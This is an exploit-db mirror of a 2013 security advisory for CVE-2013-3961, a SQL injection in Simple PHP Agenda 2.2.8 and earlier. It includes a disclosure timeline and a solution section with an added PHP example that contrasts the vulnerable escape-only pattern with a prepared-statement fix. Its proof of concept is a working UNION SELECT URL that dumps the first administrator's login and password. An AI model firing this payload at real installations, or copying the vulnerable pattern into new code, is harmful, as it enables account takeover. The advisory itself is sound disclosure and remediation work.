Simple PHP Agenda 2.2.8 – ‘edit_event.php?eventid’ SQL Injection

  • Author: Anthony Dubuissez
    Date: 2013-06-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/26136/
  • =============================================
    WEBERA ALERT ADVISORY 02
    - Discovered by: Anthony Dubuissez
    - Severity: high
    - CVE Request – 05/06/2013
    - CVE Assign – 06/06/2013
    - CVE Number – CVE-2013-3961
    - Vendor notification – 06/06/2013
    - Vendor reply – 10/06/2013
    - Public disclosure – 11/06/2013
    =============================================
    
    I. VULNERABILITY
    -------------------------
    SQL injection (iSQL) in php-agenda <= 2.2.8
    
    II. BACKGROUND
    -------------------------
    Simple Php Agenda is « a simple agenda tool written in PHP with MySQL backend. An agenda tool accessible everywhere
    there's internet ».
    
    III. DESCRIPTION
    -------------------------
    Php-Agenda 2.2.8 and lower versions contain a flaw that allows an authenticated user to perform a SQL injection (iSQL)
    attack. The flaw exists because the application does not properly sanitize parameters in the edit_event.php file
    (it relies only on the mysql_real_escape_string() function). This allows an attacker to craft a URL that dumps
    information from the database.
    A valid account is required.
    
    IV. PROOF OF CONCEPT
    -------------------------
    Dumping the login and password of the first admin.
    iSQL:
    http://server/edit_event.php?eventid=1%20union%20select%201,2,3,username,password,6,7,8,9%20from%20users%20where%20userlevel=9%20limit%200,1
    
    V. BUSINESS IMPACT
    -------------------------
    iSQL: Sensitive information can be obtained through this vulnerability, which can escalate to the compromise of a complete administrator account.
    
    VI. SYSTEMS AFFECTED
    -------------------------
    Php-Agenda 2.2.8 and lower versions
    
    VII. SOLUTION
    -------------------------
    Sanitize the GET/POST parameter correctly (do not rely on the mysql_real_escape_string() function alone).
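    The fix the advisory calls for, shown as an added illustration that is not php-agenda's own code: the escape-only pattern the description mentions next to a version that validates the parameter's type and keeps it out of the SQL text with a prepared statement. The mysqli API (a modern stand-in for the mysql_* extension of 2013), the `events` table and its column names are assumptions.

```php
<?php
// Added illustration, not php-agenda's code. The mysqli connection, the table
// name "events" and the column names are assumptions.

// 1. The pattern the advisory describes: the eventid parameter is passed
//    through real_escape_string() but interpolated into the query WITHOUT
//    quotes. Escaping only neutralises quote characters, so a value that
//    contains no quotes still becomes part of the SQL statement.
function load_event_escape_only(mysqli $db, string $eventid): ?array
{
    $escaped = $db->real_escape_string($eventid);   // no quotes around $escaped
    $sql     = "SELECT * FROM events WHERE eventid = $escaped";
    $result  = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// 2. Hardened form: validate the type first, then bind the value as an
//    integer through a prepared statement so it can never alter the query.
function load_event_prepared(mysqli $db, string $eventid): ?array
{
    // Reject anything that is not a plain positive integer.
    $id = filter_var($eventid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;   // caller should answer 400 Bad Request
    }
    $stmt = $db->prepare("SELECT eventid, title, description FROM events WHERE eventid = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $id);   // 'i': bound as an integer, not spliced as text
    $stmt->execute();
    $result = $stmt->get_result();
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Usage (assumed connection parameters):
$db    = new mysqli('localhost', 'agenda', 'secret', 'agenda');
$event = load_event_prepared($db, $_GET['eventid'] ?? '');
if ($event === null) {
    http_response_code(404);
    exit('No such event');
}
```

    The same rule applies to every parameter that is interpolated without quotes (numeric ids, LIMIT values, ORDER BY columns): escaping does nothing for them, so validate the type or use a whitelist and bind the value.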
    
    VIII. REFERENCES
    -------------------------
    http://www.webera.fr/advisory-02-php-agenda-isql-exploit/
    
    IX. CREDITS
    -------------------------
    The vulnerability has been discovered by Anthony Dubuissez (anthony (dot) dubuissez (at) webera (dot) fr).
    
    X. DISCLOSURE TIMELINE
    -------------------------
    June 05, 2013: Vulnerability acquired by Webera.
    June 06, 2013: Sent to vendor.
    June 10, 2013: Reply from vendor; vendor released a bugfix in version 2.2.9.
    June 11, 2013: Advisory published and sent to lists.
    
    XI. LEGAL NOTICES
    -------------------------
    The information contained within this advisory is supplied « as-is » with no warranties or guarantees of fitness of use
    or otherwise. Webera accepts no responsibility for any damage caused by the use or misuse of this information.
    
    XII. FOLLOW US
    -------------------------
    You can follow Webera news and security advisories at:
    On Twitter: @erathemass